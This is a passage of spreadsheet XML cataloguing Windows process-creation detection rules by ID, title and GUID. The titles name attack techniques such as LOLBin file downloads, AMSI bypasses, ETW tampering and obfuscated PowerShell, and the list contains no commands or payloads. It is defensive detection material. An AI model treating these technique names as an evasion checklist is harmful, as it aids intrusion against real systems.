      <c r="A3370" s="44" t="n"/>
      <c r="B3370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdeploy</t>
        </is>
      </c>
      <c r="C3370" s="44" t="inlineStr">
        <is>
          <t>Execute Files with Msdeploy.exe</t>
        </is>
      </c>
      <c r="D3370" s="44" t="inlineStr">
        <is>
          <t>646bc99f-6682-4b47-a73a-17b1b64c9d34</t>
        </is>
      </c>
      <c r="E3370" s="44" t="n"/>
      <c r="F3370" s="44" t="n"/>
      <c r="G3370" s="44" t="n"/>
      <c r="H3370" s="44" t="n"/>
      <c r="I3370" s="44" t="n"/>
      <c r="J3370" s="44" t="n"/>
      <c r="K3370" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3371" ht="15.75" customHeight="1" s="42">
      <c r="A3371" s="44" t="n"/>
      <c r="B3371" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdt_answer_file</t>
        </is>
      </c>
      <c r="C3371" s="44" t="inlineStr">
        <is>
          <t>Execute MSDT Via Answer File</t>
        </is>
      </c>
      <c r="D3371" s="44" t="inlineStr">
        <is>
          <t>9c8c7000-3065-44a8-a555-79bcba5d9955</t>
        </is>
      </c>
      <c r="E3371" s="44" t="n"/>
      <c r="F3371" s="44" t="n"/>
      <c r="G3371" s="44" t="n"/>
      <c r="H3371" s="44" t="n"/>
      <c r="I3371" s="44" t="n"/>
      <c r="J3371" s="44" t="n"/>
      <c r="K3371" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3372" ht="15.75" customHeight="1" s="42">
      <c r="A3372" s="44" t="n"/>
      <c r="B3372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C3372" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D3372" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E3372" s="44" t="n"/>
      <c r="F3372" s="44" t="n"/>
      <c r="G3372" s="44" t="n"/>
      <c r="H3372" s="44" t="n"/>
      <c r="I3372" s="44" t="n"/>
      <c r="J3372" s="44" t="n"/>
      <c r="K3372" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3373" ht="15.75" customHeight="1" s="42">
      <c r="A3373" s="44" t="n"/>
      <c r="B3373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_unregmp2</t>
        </is>
      </c>
      <c r="C3373" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy</t>
        </is>
      </c>
      <c r="D3373" s="44" t="inlineStr">
        <is>
          <t>727454c0-d851-48b0-8b89-385611ab0704</t>
        </is>
      </c>
      <c r="E3373" s="44" t="n"/>
      <c r="F3373" s="44" t="n"/>
      <c r="G3373" s="44" t="n"/>
      <c r="H3373" s="44" t="n"/>
      <c r="I3373" s="44" t="n"/>
      <c r="J3373" s="44" t="n"/>
      <c r="K3373" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3374" ht="15.75" customHeight="1" s="42">
      <c r="A3374" s="44" t="n"/>
      <c r="B3374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msdt_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C3374" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Using Msdt.EXE</t>
        </is>
      </c>
      <c r="D3374" s="44" t="inlineStr">
        <is>
          <t>258fc8ce-8352-443a-9120-8a11e4857fa5</t>
        </is>
      </c>
      <c r="E3374" s="44" t="n"/>
      <c r="F3374" s="44" t="n"/>
      <c r="G3374" s="44" t="n"/>
      <c r="H3374" s="44" t="n"/>
      <c r="I3374" s="44" t="n"/>
      <c r="J3374" s="44" t="n"/>
      <c r="K3374" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3375" ht="15.75" customHeight="1" s="42">
      <c r="A3375" s="44" t="n"/>
      <c r="B3375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C3375" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D3375" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E3375" s="44" t="n"/>
      <c r="F3375" s="44" t="n"/>
      <c r="G3375" s="44" t="n"/>
      <c r="H3375" s="44" t="n"/>
      <c r="I3375" s="44" t="n"/>
      <c r="J3375" s="44" t="n"/>
      <c r="K3375" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3376" ht="15.75" customHeight="1" s="42">
      <c r="A3376" s="44" t="n"/>
      <c r="B3376" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C3376" s="44" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D3376" s="44" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E3376" s="44" t="n"/>
      <c r="F3376" s="44" t="n"/>
      <c r="G3376" s="44" t="n"/>
      <c r="H3376" s="44" t="n"/>
      <c r="I3376" s="44" t="n"/>
      <c r="J3376" s="44" t="n"/>
      <c r="K3376" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3377" ht="15.75" customHeight="1" s="42">
      <c r="A3377" s="44" t="n"/>
      <c r="B3377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C3377" s="44" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D3377" s="44" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E3377" s="44" t="n"/>
      <c r="F3377" s="44" t="n"/>
      <c r="G3377" s="44" t="n"/>
      <c r="H3377" s="44" t="n"/>
      <c r="I3377" s="44" t="n"/>
      <c r="J3377" s="44" t="n"/>
      <c r="K3377" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3378" ht="15.75" customHeight="1" s="42">
      <c r="A3378" s="44" t="n"/>
      <c r="B3378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C3378" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D3378" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E3378" s="44" t="n"/>
      <c r="F3378" s="44" t="n"/>
      <c r="G3378" s="44" t="n"/>
      <c r="H3378" s="44" t="n"/>
      <c r="I3378" s="44" t="n"/>
      <c r="J3378" s="44" t="n"/>
      <c r="K3378" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3379" ht="15.75" customHeight="1" s="42">
      <c r="A3379" s="44" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B3379" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install</t>
        </is>
      </c>
      <c r="C3379" s="44" t="inlineStr">
        <is>
          <t>Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3379" s="44" t="inlineStr">
        <is>
          <t>3f5491e2-8db8-496b-9e95-1029fce852d4</t>
        </is>
      </c>
      <c r="E3379" s="44" t="n"/>
      <c r="F3379" s="44" t="n"/>
      <c r="G3379" s="44" t="n"/>
      <c r="H3379" s="44" t="n"/>
      <c r="I3379" s="44" t="n"/>
      <c r="J3379" s="44" t="n"/>
      <c r="K3379" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3380" ht="15.75" customHeight="1" s="42">
      <c r="A3380" s="44" t="n"/>
      <c r="B3380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_driver_install_susp</t>
        </is>
      </c>
      <c r="C3380" s="44" t="inlineStr">
        <is>
          <t>Suspicious Driver/DLL Installation Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D3380" s="44" t="inlineStr">
        <is>
          <t>cb0fe7c5-f3a3-484d-aa25-d350a7912729</t>
        </is>
      </c>
      <c r="E3380" s="44" t="n"/>
      <c r="F3380" s="44" t="n"/>
      <c r="G3380" s="44" t="n"/>
      <c r="H3380" s="44" t="n"/>
      <c r="I3380" s="44" t="n"/>
      <c r="J3380" s="44" t="n"/>
      <c r="K3380" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3381" ht="15.75" customHeight="1" s="42">
      <c r="A3381" s="44" t="n"/>
      <c r="B3381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_exec_susp_locations</t>
        </is>
      </c>
      <c r="C3381" s="44" t="inlineStr">
        <is>
          <t>Odbcconf.EXE Suspicious DLL Location</t>
        </is>
      </c>
      <c r="D3381" s="44" t="inlineStr">
        <is>
          <t>6b65c28e-11f3-46cb-902a-68f2cafaf474</t>
        </is>
      </c>
      <c r="E3381" s="44" t="n"/>
      <c r="F3381" s="44" t="n"/>
      <c r="G3381" s="44" t="n"/>
      <c r="H3381" s="44" t="n"/>
      <c r="I3381" s="44" t="n"/>
      <c r="J3381" s="44" t="n"/>
      <c r="K3381" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3382" ht="15.75" customHeight="1" s="42">
      <c r="A3382" s="44" t="n"/>
      <c r="B3382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powercfg_execution</t>
        </is>
      </c>
      <c r="C3382" s="44" t="inlineStr">
        <is>
          <t>Suspicious Powercfg Execution To Change Lock Screen Timeout</t>
        </is>
      </c>
      <c r="D3382" s="44" t="inlineStr">
        <is>
          <t>f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b</t>
        </is>
      </c>
      <c r="E3382" s="44" t="n"/>
      <c r="F3382" s="44" t="n"/>
      <c r="G3382" s="44" t="n"/>
      <c r="H3382" s="44" t="n"/>
      <c r="I3382" s="44" t="n"/>
      <c r="J3382" s="44" t="n"/>
      <c r="K3382" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3383" ht="15.75" customHeight="1" s="42">
      <c r="A3383" s="44" t="n"/>
      <c r="B3383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_init_failed_bypass</t>
        </is>
      </c>
      <c r="C3383" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Via .NET Reflection</t>
        </is>
      </c>
      <c r="D3383" s="44" t="inlineStr">
        <is>
          <t>30edb182-aa75-42c0-b0a9-e998bb29067c</t>
        </is>
      </c>
      <c r="E3383" s="44" t="n"/>
      <c r="F3383" s="44" t="n"/>
      <c r="G3383" s="44" t="n"/>
      <c r="H3383" s="44" t="n"/>
      <c r="I3383" s="44" t="n"/>
      <c r="J3383" s="44" t="n"/>
      <c r="K3383" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3384" ht="15.75" customHeight="1" s="42">
      <c r="A3384" s="44" t="n"/>
      <c r="B3384" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_amsi_null_bits_bypass</t>
        </is>
      </c>
      <c r="C3384" s="44" t="inlineStr">
        <is>
          <t>Potential AMSI Bypass Using NULL Bits</t>
        </is>
      </c>
      <c r="D3384" s="44" t="inlineStr">
        <is>
          <t>92a974db-ab84-457f-9ec0-55db83d7a825</t>
        </is>
      </c>
      <c r="E3384" s="44" t="n"/>
      <c r="F3384" s="44" t="n"/>
      <c r="G3384" s="44" t="n"/>
      <c r="H3384" s="44" t="n"/>
      <c r="I3384" s="44" t="n"/>
      <c r="J3384" s="44" t="n"/>
      <c r="K3384" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3385" ht="15.75" customHeight="1" s="42">
      <c r="A3385" s="44" t="n"/>
      <c r="B3385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_obfusc</t>
        </is>
      </c>
      <c r="C3385" s="44" t="inlineStr">
        <is>
          <t>Suspicious Obfuscated PowerShell Code</t>
        </is>
      </c>
      <c r="D3385" s="44" t="inlineStr">
        <is>
          <t>8d01b53f-456f-48ee-90f6-bc28e67d4e35</t>
        </is>
      </c>
      <c r="E3385" s="44" t="n"/>
      <c r="F3385" s="44" t="n"/>
      <c r="G3385" s="44" t="n"/>
      <c r="H3385" s="44" t="n"/>
      <c r="I3385" s="44" t="n"/>
      <c r="J3385" s="44" t="n"/>
      <c r="K3385" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3386" ht="15.75" customHeight="1" s="42">
      <c r="A3386" s="44" t="n"/>
      <c r="B3386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_mutexverifiers</t>
        </is>
      </c>
      <c r="C3386" s="44" t="inlineStr">
        <is>
          <t>Potential Script Proxy Execution Via CL_Mutexverifiers.ps1</t>
        </is>
      </c>
      <c r="D3386" s="44" t="inlineStr">
        <is>
          <t>1e0e1a81-e79b-44bc-935b-ddb9c8006b3d</t>
        </is>
      </c>
      <c r="E3386" s="44" t="n"/>
      <c r="F3386" s="44" t="n"/>
      <c r="G3386" s="44" t="n"/>
      <c r="H3386" s="44" t="n"/>
      <c r="I3386" s="44" t="n"/>
      <c r="J3386" s="44" t="n"/>
      <c r="K3386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3387" ht="15.75" customHeight="1" s="42">
      <c r="A3387" s="44" t="n"/>
      <c r="B3387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_enable_susp_windows_optional_feature</t>
        </is>
      </c>
      <c r="C3387" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Windows Feature Enabled - ProcCreation</t>
        </is>
      </c>
      <c r="D3387" s="44" t="inlineStr">
        <is>
          <t>c740d4cf-a1e9-41de-bb16-8a46a4f57918</t>
        </is>
      </c>
      <c r="E3387" s="44" t="n"/>
      <c r="F3387" s="44" t="n"/>
      <c r="G3387" s="44" t="n"/>
      <c r="H3387" s="44" t="n"/>
      <c r="I3387" s="44" t="n"/>
      <c r="J3387" s="44" t="n"/>
      <c r="K3387" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3388" ht="15.75" customHeight="1" s="42">
      <c r="A3388" s="44" t="n"/>
      <c r="B3388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invocation_specific</t>
        </is>
      </c>
      <c r="C3388" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Invocations - Specific - ProcessCreation</t>
        </is>
      </c>
      <c r="D3388" s="44" t="inlineStr">
        <is>
          <t>536e2947-3729-478c-9903-745aaffe60d2</t>
        </is>
      </c>
      <c r="E3388" s="44" t="n"/>
      <c r="F3388" s="44" t="n"/>
      <c r="G3388" s="44" t="n"/>
      <c r="H3388" s="44" t="n"/>
      <c r="I3388" s="44" t="n"/>
      <c r="J3388" s="44" t="n"/>
      <c r="K3388" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3389" ht="15.75" customHeight="1" s="42">
      <c r="A3389" s="44" t="n"/>
      <c r="B3389" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C3389" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3389" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E3389" s="44" t="n"/>
      <c r="F3389" s="44" t="n"/>
      <c r="G3389" s="44" t="n"/>
      <c r="H3389" s="44" t="n"/>
      <c r="I3389" s="44" t="n"/>
      <c r="J3389" s="44" t="n"/>
      <c r="K3389" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3390" ht="15.75" customHeight="1" s="42">
      <c r="A3390" s="44" t="n"/>
      <c r="B3390" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_set_unsecure_powershell_policy</t>
        </is>
      </c>
      <c r="C3390" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Execution Policy Tampering - ProcCreation</t>
        </is>
      </c>
      <c r="D3390" s="44" t="inlineStr">
        <is>
          <t>cf2e938e-9a3e-4fe8-a347-411642b28a9f</t>
        </is>
      </c>
      <c r="E3390" s="44" t="n"/>
      <c r="F3390" s="44" t="n"/>
      <c r="G3390" s="44" t="n"/>
      <c r="H3390" s="44" t="n"/>
      <c r="I3390" s="44" t="n"/>
      <c r="J3390" s="44" t="n"/>
      <c r="K3390" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3391" ht="15.75" customHeight="1" s="42">
      <c r="A3391" s="44" t="n"/>
      <c r="B3391" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_http_ip_pattern</t>
        </is>
      </c>
      <c r="C3391" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Regsvr32 HTTP IP Pattern</t>
        </is>
      </c>
      <c r="D3391" s="44" t="inlineStr">
        <is>
          <t>2dd2c217-bf68-437a-b57c-fe9fd01d5de8</t>
        </is>
      </c>
      <c r="E3391" s="44" t="n"/>
      <c r="F3391" s="44" t="n"/>
      <c r="G3391" s="44" t="n"/>
      <c r="H3391" s="44" t="n"/>
      <c r="I3391" s="44" t="n"/>
      <c r="J3391" s="44" t="n"/>
      <c r="K3391" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3392" ht="15.75" customHeight="1" s="42">
      <c r="A3392" s="44" t="n"/>
      <c r="B3392" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_remote_share</t>
        </is>
      </c>
      <c r="C3392" s="44" t="inlineStr">
        <is>
          <t>Suspicious Regsvr32 Execution From Remote Share</t>
        </is>
      </c>
      <c r="D3392" s="44" t="inlineStr">
        <is>
          <t>88a87a10-384b-4ad7-8871-2f9bf9259ce5</t>
        </is>
      </c>
      <c r="E3392" s="44" t="n"/>
      <c r="F3392" s="44" t="n"/>
      <c r="G3392" s="44" t="n"/>
      <c r="H3392" s="44" t="n"/>
      <c r="I3392" s="44" t="n"/>
      <c r="J3392" s="44" t="n"/>
      <c r="K3392" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3393" ht="15.75" customHeight="1" s="42">
      <c r="A3393" s="44" t="n"/>
      <c r="B3393" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_advpack_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C3393" s="44" t="inlineStr">
        <is>
          <t>Suspicious Advpack Call Via Rundll32.EXE</t>
        </is>
      </c>
      <c r="D3393" s="44" t="inlineStr">
        <is>
          <t>a1473adb-5338-4a20-b4c3-126763e2d3d3</t>
        </is>
      </c>
      <c r="E3393" s="44" t="n"/>
      <c r="F3393" s="44" t="n"/>
      <c r="G3393" s="44" t="n"/>
      <c r="H3393" s="44" t="n"/>
      <c r="I3393" s="44" t="n"/>
      <c r="J3393" s="44" t="n"/>
      <c r="K3393" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3394" ht="15.75" customHeight="1" s="42">
      <c r="A3394" s="44" t="n"/>
      <c r="B3394" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_no_params</t>
        </is>
      </c>
      <c r="C3394" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Execution Without CommandLine Parameters</t>
        </is>
      </c>
      <c r="D3394" s="44" t="inlineStr">
        <is>
          <t>1775e15e-b61b-4d14-a1a3-80981298085a</t>
        </is>
      </c>
      <c r="E3394" s="44" t="n"/>
      <c r="F3394" s="44" t="n"/>
      <c r="G3394" s="44" t="n"/>
      <c r="H3394" s="44" t="n"/>
      <c r="I3394" s="44" t="n"/>
      <c r="J3394" s="44" t="n"/>
      <c r="K3394" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3395" ht="15.75" customHeight="1" s="42">
      <c r="A3395" s="44" t="n"/>
      <c r="B3395" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_download</t>
        </is>
      </c>
      <c r="C3395" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3395" s="44" t="inlineStr">
        <is>
          <t>1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c</t>
        </is>
      </c>
      <c r="E3395" s="44" t="n"/>
      <c r="F3395" s="44" t="n"/>
      <c r="G3395" s="44" t="n"/>
      <c r="H3395" s="44" t="n"/>
      <c r="I3395" s="44" t="n"/>
      <c r="J3395" s="44" t="n"/>
      <c r="K3395" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3396" ht="15.75" customHeight="1" s="42">
      <c r="A3396" s="44" t="n"/>
      <c r="B3396" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_proxy_execution</t>
        </is>
      </c>
      <c r="C3396" s="44" t="inlineStr">
        <is>
          <t>Process Proxy Execution Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D3396" s="44" t="inlineStr">
        <is>
          <t>45239e6a-b035-4aaf-b339-8ad379fcb67e</t>
        </is>
      </c>
      <c r="E3396" s="44" t="n"/>
      <c r="F3396" s="44" t="n"/>
      <c r="G3396" s="44" t="n"/>
      <c r="H3396" s="44" t="n"/>
      <c r="I3396" s="44" t="n"/>
      <c r="J3396" s="44" t="n"/>
      <c r="K3396" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3397" ht="15.75" customHeight="1" s="42">
      <c r="A3397" s="44" t="n"/>
      <c r="B3397" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_alternate_data_streams</t>
        </is>
      </c>
      <c r="C3397" s="44" t="inlineStr">
        <is>
          <t>Execute From Alternate Data Streams</t>
        </is>
      </c>
      <c r="D3397" s="44" t="inlineStr">
        <is>
          <t>7f43c430-5001-4f8b-aaa9-c3b88f18fa5c</t>
        </is>
      </c>
      <c r="E3397" s="44" t="n"/>
      <c r="F3397" s="44" t="n"/>
      <c r="G3397" s="44" t="n"/>
      <c r="H3397" s="44" t="n"/>
      <c r="I3397" s="44" t="n"/>
      <c r="J3397" s="44" t="n"/>
      <c r="K3397" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3398" ht="15.75" customHeight="1" s="42">
      <c r="A3398" s="44" t="n"/>
      <c r="B3398" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_appx_execution</t>
        </is>
      </c>
      <c r="C3398" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Windows App Activity</t>
        </is>
      </c>
      <c r="D3398" s="44" t="inlineStr">
        <is>
          <t>f91ed517-a6ba-471d-9910-b3b4a398c0f3</t>
        </is>
      </c>
      <c r="E3398" s="44" t="n"/>
      <c r="F3398" s="44" t="n"/>
      <c r="G3398" s="44" t="n"/>
      <c r="H3398" s="44" t="n"/>
      <c r="I3398" s="44" t="n"/>
      <c r="J3398" s="44" t="n"/>
      <c r="K3398" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3399" ht="15.75" customHeight="1" s="42">
      <c r="A3399" s="44" t="n"/>
      <c r="B3399" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_bad_opsec_sacrificial_processes</t>
        </is>
      </c>
      <c r="C3399" s="44" t="inlineStr">
        <is>
          <t>Bad Opsec Defaults Sacrificial Processes With Improper Arguments</t>
        </is>
      </c>
      <c r="D3399" s="44" t="inlineStr">
        <is>
          <t>a7c3d773-caef-227e-a7e7-c2f13c622329</t>
        </is>
      </c>
      <c r="E3399" s="44" t="n"/>
      <c r="F3399" s="44" t="n"/>
      <c r="G3399" s="44" t="n"/>
      <c r="H3399" s="44" t="n"/>
      <c r="I3399" s="44" t="n"/>
      <c r="J3399" s="44" t="n"/>
      <c r="K3399" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3400" ht="15.75" customHeight="1" s="42">
      <c r="A3400" s="44" t="n"/>
      <c r="B3400" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_disable_raccine</t>
        </is>
      </c>
      <c r="C3400" s="44" t="inlineStr">
        <is>
          <t>Raccine Uninstall</t>
        </is>
      </c>
      <c r="D3400" s="44" t="inlineStr">
        <is>
          <t>a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc</t>
        </is>
      </c>
      <c r="E3400" s="44" t="n"/>
      <c r="F3400" s="44" t="n"/>
      <c r="G3400" s="44" t="n"/>
      <c r="H3400" s="44" t="n"/>
      <c r="I3400" s="44" t="n"/>
      <c r="J3400" s="44" t="n"/>
      <c r="K3400" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3401" ht="15.75" customHeight="1" s="42">
      <c r="A3401" s="44" t="n"/>
      <c r="B3401" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_dumpstack_log_evasion</t>
        </is>
      </c>
      <c r="C3401" s="44" t="inlineStr">
        <is>
          <t>DumpStack.log Defender Evasion</t>
        </is>
      </c>
      <c r="D3401" s="44" t="inlineStr">
        <is>
          <t>4f647cfa-b598-4e12-ad69-c68dd16caef8</t>
        </is>
      </c>
      <c r="E3401" s="44" t="n"/>
      <c r="F3401" s="44" t="n"/>
      <c r="G3401" s="44" t="n"/>
      <c r="H3401" s="44" t="n"/>
      <c r="I3401" s="44" t="n"/>
      <c r="J3401" s="44" t="n"/>
      <c r="K3401" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3402" ht="15.75" customHeight="1" s="42">
      <c r="A3402" s="44" t="n"/>
      <c r="B3402" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_emoji_usage_in_cli_1</t>
        </is>
      </c>
      <c r="C3402" s="44" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1</t>
        </is>
      </c>
      <c r="D3402" s="44" t="inlineStr">
        <is>
          <t>4a30ac0c-b9d6-4e01-b71a-5f851bbf4259</t>
        </is>
      </c>
      <c r="E3402" s="44" t="n"/>
      <c r="F3402" s="44" t="n"/>
      <c r="G3402" s="44" t="n"/>
      <c r="H3402" s="44" t="n"/>
      <c r="I3402" s="44" t="n"/>
      <c r="J3402" s="44" t="n"/>
      <c r="K3402" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3403" ht="15.75" customHeight="1" s="42">
      <c r="A3403" s="44" t="n"/>
      <c r="B3403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_emoji_usage_in_cli_3</t>
        </is>
      </c>
      <c r="C3403" s="44" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3</t>
        </is>
      </c>
      <c r="D3403" s="44" t="inlineStr">
        <is>
          <t>f9578658-9e71-4711-b634-3f9b50cd3c06</t>
        </is>
      </c>
      <c r="E3403" s="44" t="n"/>
      <c r="F3403" s="44" t="n"/>
      <c r="G3403" s="44" t="n"/>
      <c r="H3403" s="44" t="n"/>
      <c r="I3403" s="44" t="n"/>
      <c r="J3403" s="44" t="n"/>
      <c r="K3403" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3404" ht="15.75" customHeight="1" s="42">
      <c r="A3404" s="44" t="n"/>
      <c r="B3404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_emoji_usage_in_cli_4</t>
        </is>
      </c>
      <c r="C3404" s="44" t="inlineStr">
        <is>
          <t>Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4</t>
        </is>
      </c>
      <c r="D3404" s="44" t="inlineStr">
        <is>
          <t>225274c4-8dd1-40db-9e09-71dff4f6fb3c</t>
        </is>
      </c>
      <c r="E3404" s="44" t="n"/>
      <c r="F3404" s="44" t="n"/>
      <c r="G3404" s="44" t="n"/>
      <c r="H3404" s="44" t="n"/>
      <c r="I3404" s="44" t="n"/>
      <c r="J3404" s="44" t="n"/>
      <c r="K3404" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3405" ht="15.75" customHeight="1" s="42">
      <c r="A3405" s="44" t="n"/>
      <c r="B3405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_modification_cmdline</t>
        </is>
      </c>
      <c r="C3405" s="44" t="inlineStr">
        <is>
          <t>ETW Logging Tamper In .NET Processes Via CommandLine</t>
        </is>
      </c>
      <c r="D3405" s="44" t="inlineStr">
        <is>
          <t>41421f44-58f9-455d-838a-c398859841d4</t>
        </is>
      </c>
      <c r="E3405" s="44" t="n"/>
      <c r="F3405" s="44" t="n"/>
      <c r="G3405" s="44" t="n"/>
      <c r="H3405" s="44" t="n"/>
      <c r="I3405" s="44" t="n"/>
      <c r="J3405" s="44" t="n"/>
      <c r="K3405" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3406" ht="15.75" customHeight="1" s="42">
      <c r="A3406" s="44" t="n"/>
      <c r="B3406" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_etw_trace_evasion</t>
        </is>
      </c>
      <c r="C3406" s="44" t="inlineStr">
        <is>
          <t>ETW Trace Evasion Activity</t>
        </is>
      </c>
      <c r="D3406" s="44" t="inlineStr">
        <is>
          <t>a238b5d0-ce2d-4414-a676-7a531b3d13d6</t>
        </is>
      </c>
      <c r="E3406" s="44" t="n"/>
      <c r="F3406" s="44" t="n"/>
      <c r="G3406" s="44" t="n"/>
      <c r="H3406" s="44" t="n"/>
